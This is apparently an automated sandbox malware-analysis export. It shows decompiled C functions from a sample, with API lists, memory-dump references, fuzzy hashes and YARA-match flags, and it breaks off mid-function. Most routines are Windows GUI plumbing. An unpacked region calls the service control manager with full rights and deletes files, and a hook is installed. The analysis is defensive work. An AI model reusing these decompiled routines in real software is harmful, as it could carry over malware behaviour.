                  			E0040CCC8(intOrPtr* __ecx, int _a4, int _a8, long _a12) {
                  				_Unknown_base(*)()* _t11;
                  				long _t12;
                  				intOrPtr* _t17;
                  
                  				_t17 = __ecx;
                  				_t11 =  *(__ecx + 0x40);
                  				if(_t11 != 0) {
                  					L3:
                  					_t12 = CallWindowProcA(_t11,  *(_t17 + 0x20), _a4, _a8, _a12); // executed
                  					return _t12;
                  				}
                  				_t11 =  *( *((intOrPtr*)( *__ecx + 0xf8))());
                  				if(_t11 != 0) {
                  					goto L3;
                  				}
                  				return DefWindowProcA( *(__ecx + 0x20), _a4, _a8, _a12);
                  			}







                  APIs
                  • DefWindowProcA.USER32(?,?,?,?), ref: 0040CCF1
                  • CallWindowProcA.USER32 ref: 0040CD06
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ProcWindow$Call
                  • String ID:
                  • API String ID: 2316559721-0
                  • Opcode ID: 31c9da80100a9d816eb6298f82ff38ddf85138840a761073849e75ee9fde59f5
                  • Instruction ID: a59e30d0e50e3c6695c8649c18ee593f55ddf464080dc148df40e0021e8dadaa
                  • Opcode Fuzzy Hash: 31c9da80100a9d816eb6298f82ff38ddf85138840a761073849e75ee9fde59f5
                  • Instruction Fuzzy Hash: 8CF0F836100205FFDF115FA5DC48DAA7FB9FF08350B148529FA5996120E732D820AB44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E00413276(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t15;
                  				intOrPtr _t19;
                  				void* _t22;
                  				void* _t23;
                  
                  				_push(0);
                  				E00431A9B(E0044B200, __ebx, __edi, __esi);
                  				_t22 = __ecx;
                  				_t25 =  *((intOrPtr*)(__ecx + 0x94));
                  				_t13 =  *((intOrPtr*)(_t23 + 8));
                  				 *((intOrPtr*)(__ecx + 0x88)) =  *((intOrPtr*)(_t23 + 8));
                  				if( *((intOrPtr*)(__ecx + 0x94)) == 0) {
                  					_t15 = E00404461(_t25, 0xb0); // executed
                  					_t19 = _t15;
                  					 *((intOrPtr*)(_t23 + 8)) = _t19;
                  					 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
                  					if(_t19 == 0) {
                  						_t13 = 0;
                  						__eflags = 0;
                  					} else {
                  						_t13 = E0042519C(_t19, _t22);
                  					}
                  					 *((intOrPtr*)(_t22 + 0x94)) = _t13;
                  				}
                  				if( *((intOrPtr*)(_t22 + 0x38)) == 0) {
                  					 *((intOrPtr*)(_t22 + 0x38)) = GetParent( *(_t22 + 0x20));
                  				}
                  				return E00431B73(_t13);
                  			}








                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041327D
                  • GetParent.USER32(?), ref: 004132C7
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3Parent_malloc
                  • String ID:
                  • API String ID: 4058389177-0
                  • Opcode ID: c689719606693e2765ef589d72a80aa2abebd4b93b4cbd792dbfe7422f500bb7
                  • Instruction ID: 5fd53afc60951b9d1215e33b10396915e24fbcf05b250d538ea7ccb8a05cbf96
                  • Opcode Fuzzy Hash: c689719606693e2765ef589d72a80aa2abebd4b93b4cbd792dbfe7422f500bb7
                  • Instruction Fuzzy Hash: 67F082305017149FEB60AF31C54579B76E0BF0431AF50847FE94A866A1DB7CA5848B4D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00407887(void* __ecx) {
                  				struct HINSTANCE__* _t11;
                  				signed int _t12;
                  				void* _t15;
                  
                  				_t15 = __ecx;
                  				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                  					_t11 = GetModuleHandleA( *(__ecx + 0xc)); // executed
                  					 *(_t15 + 4) = _t11;
                  					if(_t11 == 0) {
                  						_t12 = LoadLibraryA( *(_t15 + 0xc));
                  						 *(_t15 + 4) = _t12;
                  						 *((char*)(_t15 + 8)) = _t12 & 0xffffff00 | _t12 != 0x00000000;
                  					}
                  				}
                  				return  *(_t15 + 4);
                  			}







                  APIs
                  • GetModuleHandleA.KERNELBASE(?,?,0040EC76,InitCommonControlsEx,00000000,?,0040F54A,00080000,00008000,?,?,00412253,?,00080000,?,?), ref: 00407895
                  • LoadLibraryA.KERNEL32(?,?,0040EC76,InitCommonControlsEx,00000000,?,0040F54A,00080000,00008000,?,?,00412253,?,00080000,?,?), ref: 004078A5
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: HandleLibraryLoadModule
                  • String ID:
                  • API String ID: 4133054770-0
                  • Opcode ID: 51c6b0a14c209bda3158205d76c13f49e01c4838667900211617a1ac94583d4c
                  • Instruction ID: b2e4a917816264131c583018976e3fb6b99e390f365dd9a40fef115991fd453c
                  • Opcode Fuzzy Hash: 51c6b0a14c209bda3158205d76c13f49e01c4838667900211617a1ac94583d4c
                  • Instruction Fuzzy Hash: A9E08C32901B01CFD7319F25E808A43BBE4BF04B20B10C83EE8AAD3A20E730E840CB10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 86%
                  			E004161F7(void* __esi, void* __eflags) {
                  				void* _t3;
                  				void* _t4;
                  				struct HHOOK__* _t6;
                  				void* _t7;
                  				void* _t8;
                  
                  				_t3 = E0041F363(_t7, _t8, __esi, __eflags);
                  				_t13 =  *((char*)(_t3 + 0x14));
                  				if( *((char*)(_t3 + 0x14)) == 0) {
                  					_push(__esi);
                  					_t4 = E0041EDAB(_t7, _t8, __esi, _t13);
                  					_t6 = SetWindowsHookExA(0xffffffff, E0041605F, 0, GetCurrentThreadId()); // executed
                  					 *(_t4 + 0x2c) = _t6;
                  					return _t6;
                  				}
                  				return _t3;
                  			}









                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CurrentHookThreadWindows
                  • String ID:
                  • API String ID: 1904029216-0
                  • Opcode ID: e16487a409085e34aeffa5215726b9f530c3ec48cf8e42557f90223b3f04fdec
                  • Instruction ID: 0d4e1b78ceb5744933d127dfd959b1211db20431d59c43cc5bd31d8bd1737379
                  • Opcode Fuzzy Hash: e16487a409085e34aeffa5215726b9f530c3ec48cf8e42557f90223b3f04fdec
                  • Instruction Fuzzy Hash: 88D0A7354043106ED7206B727C09B963F50BB86338F150A5EF921522D6C52C85C24F5D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,023ED662,00000102,023EAC19,?,023EAC8F), ref: 023ECE99
                  • CloseServiceHandle.ADVAPI32(00000000,?,023EAC8F), ref: 023ECEAE
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandleManagerOpenService
                  • String ID:
                  • API String ID: 1199824460-0
                  • Opcode ID: 2375b80f15f49602a1374a7cb7223444517120f5ff7a59dce11ed870a4b6905d
                  • Instruction ID: 2283bd941a45c29a6fa1f14cd82795979bd6ac9545b50d099729ea1e1e37dcea
                  • Opcode Fuzzy Hash: 2375b80f15f49602a1374a7cb7223444517120f5ff7a59dce11ed870a4b6905d
                  • Instruction Fuzzy Hash: 28C08CB0BC03009BEFE45B68BC09B253A6C7700F46F140800E709D50C6CBF04050D620
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetProcessHeap.KERNEL32(00000008,023EF000,023E1A84,?,?,?,?,?,?,?,023E10F5), ref: 023E14F5
                  • RtlAllocateHeap.NTDLL(00000000), ref: 023E14FC
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID:
                  • API String ID: 1357844191-0
                  • Opcode ID: 0e05aa74553666f438bcba058a761d354d4d5aa52c51087bb724ef5f20fc4973
                  • Instruction ID: 6751b85cb853eb1747d50180c2d3c0552d7bf3d7226242c54e5bee74ef9e8a70
                  • Opcode Fuzzy Hash: 0e05aa74553666f438bcba058a761d354d4d5aa52c51087bb724ef5f20fc4973
                  • Instruction Fuzzy Hash: 7DA002F5D901005BDD8857F8BE5DA19375CB744705F104944F3458604A9E7454148725
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 97%
                  			E004217B7(void* __ebx, intOrPtr* __ecx, void* __edi, signed int _a8) {
                  				intOrPtr* _v8;
                  				intOrPtr _v12;
                  				char _v16;
                  				struct tagRECT _v32;
                  				signed int _t74;
                  				signed char _t79;
                  				intOrPtr _t82;
                  				intOrPtr _t88;
                  				intOrPtr* _t91;
                  				intOrPtr _t92;
                  				signed int _t96;
                  				signed int _t97;
                  				intOrPtr _t101;
                  				intOrPtr _t104;
                  				intOrPtr _t109;
                  				signed int _t110;
                  				struct HDWP__** _t112;
                  
                  				_t112 = _a8;
                  				_push(_t112);
                  				_v8 = __ecx;
                  				_t74 =  *((intOrPtr*)( *__ecx + 0x16c))();
                  				_a8 = _t74;
                  				if((_t74 & 0x10000000) == 0 || (_t74 & 0x0000f000) == 0) {
                  					L28:
                  					return 0;
                  				} else {
                  					CopyRect( &_v32, _t112 + 4);
                  					_t109 = _v32.right - _v32.left;
                  					_t88 = _v32.bottom - _v32.top;
                  					_t91 = _v8;
                  					_t79 =  *(_t91 + 0x84);
                  					_t96 = 0 |  *((intOrPtr*)(_t112 + 0x1c)) != 0x00000000;
                  					if((_t79 & 0x00000004) == 0 || (_t79 & 0x00000001) == 0) {
                  						if((_a8 & 0x0000a000) == 0) {
                  							_t97 = _t96 | 0x00000010;
                  						} else {
                  							_t97 = _t96 | 0x0000000a;
                  						}
                  					} else {
                  						_t97 = _t96 | 0x00000006;
                  					}
                  					 *((intOrPtr*)( *_t91 + 0x140))( &_v16, 0xffffffff, _t97);
                  					_t92 = _v16;
                  					if(_t92 >= _t109) {
                  						_t92 = _t109;
                  						_v16 = _t92;
                  					}
                  					_t82 = _v12;
                  					if(_t82 >= _t88) {
                  						_t82 = _t88;
                  						_v12 = _t82;
                  					}
                  					_t110 = _a8;
                  					if((_t110 & 0x0000a000) == 0) {
                  						if((_t110 & 0x00005000) != 0) {
                  							_t101 =  *((intOrPtr*)(_t112 + 0x18));
                  							 *((intOrPtr*)(_t112 + 0x14)) =  *((intOrPtr*)(_t112 + 0x14)) + _t92;
                  							if(_t101 <= _t82) {
                  								_t101 = _t82;
                  							}
                  							 *((intOrPtr*)(_t112 + 0x18)) = _t101;
                  							if((_t110 & 0x00001000) == 0) {
                  								if((_t110 & 0x00004000) != 0) {
                  									 *((intOrPtr*)(_t112 + 0xc)) =  *((intOrPtr*)(_t112 + 0xc)) - _t92;
                  									_v32.left = _v32.right - _t92;
                  								}
                  							} else {
                  								 *(_t112 + 4) =  *(_t112 + 4) + _t92;
                  							}
                  						}
                  					} else {
                  						_t104 =  *((intOrPtr*)(_t112 + 0x14));
                  						 *((intOrPtr*)(_t112 + 0x18)) =  *((intOrPtr*)(_t112 + 0x18)) + _t82;
                  						if(_t104 <= _t92) {
                  							_t104 = _t92;
                  						}
                  						 *((intOrPtr*)(_t112 + 0x14)) = _t104;
                  						if((_t110 & 0x00002000) == 0) {
                  							if((_t110 & 0x00008000) != 0) {
                  								 *((intOrPtr*)(_t112 + 0x10)) =  *((intOrPtr*)(_t112 + 0x10)) - _t82;
                  								_v32.top = _v32.bottom - _t82;
                  							}
                  						} else {
                  							 *((intOrPtr*)(_t112 + 8)) =  *((intOrPtr*)(_t112 + 8)) + _t82;
                  						}
                  					}
                  					_v32.right = _v32.left + _t92;
                  					_v32.bottom = _v32.top + _t82;
                  					if( *_t112 != 0) {
                  						E0040CEE2(_t112,  *((intOrPtr*)(_v8 + 0x20)),  &_v32);
                  					}
                  					goto L28;
                  				}
                  			}





















                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CopyRect
                  • String ID:
                  • API String ID: 1989077687-0
                  • Opcode ID: 6375a65d15a0f0f061cf90aeb32674f20a7cbe1805a7c2e37a1dc44e5b91dcc2
                  • Instruction ID: b6c8682c3a5f8d4b9bbb0fe91b9393bb500e1cc71d8d3095f72ca3a43206c229
                  • Opcode Fuzzy Hash: 6375a65d15a0f0f061cf90aeb32674f20a7cbe1805a7c2e37a1dc44e5b91dcc2
                  • Instruction Fuzzy Hash: 44419A31E003159FCB28DFA9D484AAFB7F6BF94300F64852ED41693364E738A945CB89
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E0041730A(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr* _t38;
                  				signed int _t40;
                  				intOrPtr* _t49;
                  				signed int _t57;
                  				intOrPtr* _t84;
                  				void* _t85;
                  
                  				_push(4);
                  				E00431A9B(E0044B513, __ebx, __edi, __esi);
                  				_t82 = __ecx;
                  				_t38 =  *((intOrPtr*)( *__ecx + 0x6c))();
                  				_t84 = _t38;
                  				_t87 = _t84;
                  				if(_t84 != 0) {
                  					 *(_t84 + 0x4c) =  *(_t84 + 0x4c) & 0x00000000;
                  					_push(0);
                  					_push(_t84);
                  					_t40 =  *((intOrPtr*)( *__ecx + 0x70))();
                  					 *(_t85 - 0x10) = _t40;
                  					__eflags = _t40;
                  					if(__eflags != 0) {
                  						__eflags =  *(_t85 + 8);
                  						if(__eflags != 0) {
                  							E0040D6DD(0, _t85 + 0xb, __ecx, __eflags);
                  							 *(_t85 - 4) = 0;
                  							__eflags =  *((intOrPtr*)( *_t84 + 0x74))( *(_t85 + 8));
                  							if(__eflags != 0) {
                  								 *((intOrPtr*)( *_t84 + 0x54))( *(_t85 + 8), 1);
                  								_t29 = _t85 - 4;
                  								 *_t29 =  *(_t85 - 4) | 0xffffffff;
                  								__eflags =  *_t29;
                  								E004119E0(0, _t85 + 0xb, _t82, _t84,  *_t29);
                  								goto L14;
                  							} else {
                  								 *((intOrPtr*)( *( *(_t85 - 0x10)) + 0x60))();
                  								 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
                  								E004119E0(0, _t85 + 0xb, _t82, _t84, __eflags);
                  								goto L2;
                  							}
                  						} else {
                  							_push(_t84);
                  							 *((intOrPtr*)( *__ecx + 0x84))();
                  							__eflags =  *(_t85 + 0xc);
                  							if( *(_t85 + 0xc) == 0) {
                  								 *((intOrPtr*)(_t84 + 0x50)) = 1;
                  							}
                  							_t57 =  *((intOrPtr*)( *_t84 + 0x70))();
                  							__eflags = _t57;
                  							if(_t57 != 0) {
                  								 *((intOrPtr*)(_t82 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x8c)) + 1;
                  								L14:
                  								 *((intOrPtr*)( *_t82 + 0x74))( *(_t85 - 0x10), _t84,  *(_t85 + 0xc));
                  								_t49 = _t84;
                  							} else {
                  								 *((intOrPtr*)( *( *(_t85 - 0x10)) + 0x60))();
                  								goto L2;
                  							}
                  						}
                  					} else {
                  						E00417146(0, __edx, __ecx, _t84, __eflags);
                  						 *((intOrPtr*)( *_t84 + 4))(1, 0xf104, 0, 0xffffffff);
                  						goto L2;
                  					}
                  				} else {
                  					_push(0xffffffff);
                  					_push(_t38);
                  					_push(0xf104);
                  					E00417146(__ebx, __edx, __ecx, _t84, _t87);
                  					L2:
                  					_t49 = 0;
                  				}
                  				return E00431B73(_t49);
                  			}










                  APIs
                  • __EH_prolog3.LIBCMT ref: 00417311
                    • Part of subcall function 00417146: __EH_prolog3.LIBCMT ref: 0041714D
                    • Part of subcall function 004119E0: __EH_prolog3_catch_GS.LIBCMT ref: 004119EA
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$H_prolog3_catch_
                  • String ID:
                  • API String ID: 2899319929-0
                  • Opcode ID: d39df0fc78a5d45c1090d89ee54a143fec968a8c40ed11aa394c250920cd21a2
                  • Instruction ID: ffda74f464d4dc7f0a604a0d06fefe8caa514aab76a61e0630f1065df7d55a41
                  • Opcode Fuzzy Hash: d39df0fc78a5d45c1090d89ee54a143fec968a8c40ed11aa394c250920cd21a2
                  • Instruction Fuzzy Hash: 88316B30604219EFCB20AF64C885AAEB7B1BF04314F10455AFD628B3A1DB78D981DB49
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 023ECEB5: lstrlenW.KERNEL32(00000000,?,00000000), ref: 023ECEC6
                  • DeleteFileW.KERNELBASE(?), ref: 023ED0DD
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteFilelstrlen
                  • String ID:
                  • API String ID: 2942981432-0
                  • Opcode ID: f9bfa0e03e4c142368f7f87ec3eff5aa6544902ac77affd2662a42878dae72a6
                  • Instruction ID: 08134cb82973ab01f8557869c7621de233ee336918df5291cbc84adb2638c092
                  • Opcode Fuzzy Hash: f9bfa0e03e4c142368f7f87ec3eff5aa6544902ac77affd2662a42878dae72a6
                  • Instruction Fuzzy Hash: 18118BB5A0012CDBCF20B665AC489EB726EDB84350F4405A6E64FD3281EE708D998AA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E0040F62D(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t39;
                  				intOrPtr _t56;
                  				signed int _t58;
                  				signed int _t62;
                  				intOrPtr _t70;
                  				signed int _t76;
                  				void* _t78;
                  				void* _t82;
                  				intOrPtr _t83;
                  
                  				_t82 = __eflags;
                  				_push(0x38);
                  				E00431ACE(E0044B025, __ebx, __edi, __esi);
                  				_t56 = E00420AEC(__ebx, 0x466508, __edi, __esi, _t82, 0x406452);
                  				_t83 = _t56;
                  				 *((intOrPtr*)(_t78 - 0x18)) = _t56;
                  				_t84 = _t83 == 0;
                  				if(_t83 == 0) {
                  					E00406436(_t56, 0x466508, __edi, __esi, _t84);
                  				}
                  				_t4 = _t56 + 0x58; // 0x58
                  				_t58 = 7;
                  				_t39 = memcpy(_t78 - 0x44, _t4, _t58 << 2);
                  				_t70 =  *((intOrPtr*)(_t78 + 0x10));
                  				_t76 =  *(_t78 + 8);
                  				 *_t39 =  *(_t78 + 0xc);
                  				 *((intOrPtr*)(_t56 + 0x60)) =  *((intOrPtr*)(_t78 + 0x14));
                  				 *((intOrPtr*)(_t56 + 0x5c)) = _t70;
                  				 *((intOrPtr*)(_t56 + 0x64)) =  *((intOrPtr*)(_t78 + 0x18));
                  				 *((intOrPtr*)(_t78 - 4)) = 0;
                  				if(_t70 == 2 &&  *((intOrPtr*)(_t76 + 0x4c)) != 0) {
                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x4c)))) + 0x60))(0);
                  				}
                  				 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                  				if(_t70 == 0x110) {
                  					E0040D7C1(_t76, _t78 - 0x28, _t78 + 8);
                  				}
                  				 *((intOrPtr*)(_t78 + 0x18)) =  *((intOrPtr*)( *_t76 + 0x110))(_t70,  *((intOrPtr*)(_t78 + 0x14)),  *((intOrPtr*)(_t78 + 0x18)));
                  				if(_t70 == 0x110) {
                  					E0040F5B7(_t56, 0, _t76, _t78 - 0x28,  *(_t78 + 8));
                  				}
                  				_t30 = _t56 + 0x58; // 0x58
                  				_t62 = 7;
                  				return E00431B73(memcpy(_t30, _t78 - 0x44, _t62 << 2));
                  			}













                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 0040F634
                    • Part of subcall function 00420AEC: __EH_prolog3.LIBCMT ref: 00420AF3
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$Exception@8H_prolog3_catchThrow
                  • String ID:
                  • API String ID: 24280941-0
                  • Opcode ID: a5e4790e460b5be2e02f3c679bf46ce18870f2b1a8203689afa57875004627af
                  • Instruction ID: 55c1a81f4b8db02ad9ddc7eda2fdd22912c5a9ef6f5b427848955299c37591cb
                  • Opcode Fuzzy Hash: a5e4790e460b5be2e02f3c679bf46ce18870f2b1a8203689afa57875004627af
                  • Instruction Fuzzy Hash: 6B217A72A00209DFCF15DFA4C4819DE3BA6FF58310F11843AF905AB691C738A985CB99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 53%
                  			E004012B0(intOrPtr* __ecx, void* __edx) {
                  				void* __ebx;
                  				intOrPtr* _t14;
                  				void* _t16;
                  				signed int _t18;
                  				void* _t20;
                  				void* _t23;
                  				intOrPtr _t24;
                  				intOrPtr* _t26;
                  				intOrPtr* _t28;
                  				void* _t38;
                  				void* _t39;
                  				void* _t41;
                  				intOrPtr _t42;
                  				intOrPtr* _t43;
                  				void* _t45;
                  				intOrPtr _t46;
                  				intOrPtr _t47;
                  				void* _t49;
                  				void* _t50;
                  
                  				_t26 = __ecx;
                  				E00401090(__ecx, __edx, 0x8007000e);
                  				asm("int3");
                  				asm("int3");
                  				asm("int3");
                  				asm("int3");
                  				asm("int3");
                  				asm("int3");
                  				_t42 =  *_t26;
                  				_t24 =  *((intOrPtr*)(_t42 - 0xc));
                  				_t43 = _t42 - 0x10;
                  				 *((intOrPtr*)(_t49 + 0xc)) = _t26;
                  				_t14 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t43)) + 0x10))))(_t38, _t41, _t45, _t23, _t26);
                  				_t35 =  *_t14;
                  				_t46 =  *((intOrPtr*)(_t49 + 0x18));
                  				_t28 = _t14;
                  				_t16 =  *((intOrPtr*)( *((intOrPtr*)( *_t14))))(_t46, 1); // executed
                  				_t39 = _t16;
                  				if(_t39 == 0) {
                  					E004012B0(_t28, _t35);
                  				}
                  				if(_t24 < _t46) {
                  					_t46 = _t24;
                  				}
                  				_t5 = _t46 + 1; // 0x1
                  				_t7 = _t39 + 0x10; // 0x10
                  				_t47 = _t7;
                  				_t18 = E0043065F(_t24, _t43 + 0x10, _t47, _t5, _t43 + 0x10, _t5);
                  				_t50 = _t49 + 0x10;
                  				 *((intOrPtr*)(_t39 + 4)) = _t24;
                  				asm("lock xadd [edx], eax");
                  				_t20 = (_t18 | 0xffffffff) - 1;
                  				if(_t20 <= 0) {
                  					_t20 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t43)) + 4))))(_t43);
                  				}
                  				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x10)))) = _t47;
                  				return _t20;
                  			}























                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: _memcpy_s
                  • String ID:
                  • API String ID: 2001391462-0
                  • Opcode ID: af4fe0bf2a3b28bfa50e0f5dc0aec7f342693b3242073af976542bc3b97a567a
                  • Instruction ID: cb3531059e7c9241c49a6eff8f265f17319ee8308a504db105d52463e5de0ade
                  • Opcode Fuzzy Hash: af4fe0bf2a3b28bfa50e0f5dc0aec7f342693b3242073af976542bc3b97a567a
                  • Instruction Fuzzy Hash: 701186722006059FD305EF68C880D67B3A9FF8D314B10866EE65597351EB75E901CB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E00405714(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t29;
                  				void* _t32;
                  				void* _t34;
                  				intOrPtr _t41;
                  				void* _t56;
                  				intOrPtr* _t60;
                  				void* _t61;
                  				void* _t62;
                  
                  				_t56 = __edx;
                  				_push(4);
                  				E00431A9B(E0044ABB9, __ebx, __edi, __esi);
                  				_t60 = __ecx;
                  				_t29 =  *((intOrPtr*)(_t62 + 0x14));
                  				_t44 =  *((intOrPtr*)(_t62 + 8));
                  				 *(_t62 + 0xc) =  *(_t62 + 0xc) | 0x40000000;
                  				 *((intOrPtr*)(__ecx + 0xa4)) =  *((intOrPtr*)(_t62 + 8));
                  				if(_t29 != 0) {
                  					_t41 =  *((intOrPtr*)(_t29 + 8));
                  					if(_t41 != 0) {
                  						 *((intOrPtr*)(__ecx + 0xe8)) =  *((intOrPtr*)(_t41 + 0x68));
                  						 *((intOrPtr*)(__ecx + 0x60)) =  *((intOrPtr*)(_t41 + 0x6c));
                  					}
                  				}
                  				E004014C0(_t62 - 0x10, _t56);
                  				 *(_t62 - 4) =  *(_t62 - 4) & 0x00000000;
                  				E004014C0(_t62 + 8, _t56);
                  				 *(_t62 - 4) = 1;
                  				_t32 = E00402720(_t62 - 0x10, _t44);
                  				_t66 = _t32;
                  				if(_t32 != 0) {
                  					E0041B29E(_t62 + 8,  *((intOrPtr*)(_t62 - 0x10)), 0, 0xa);
                  				}
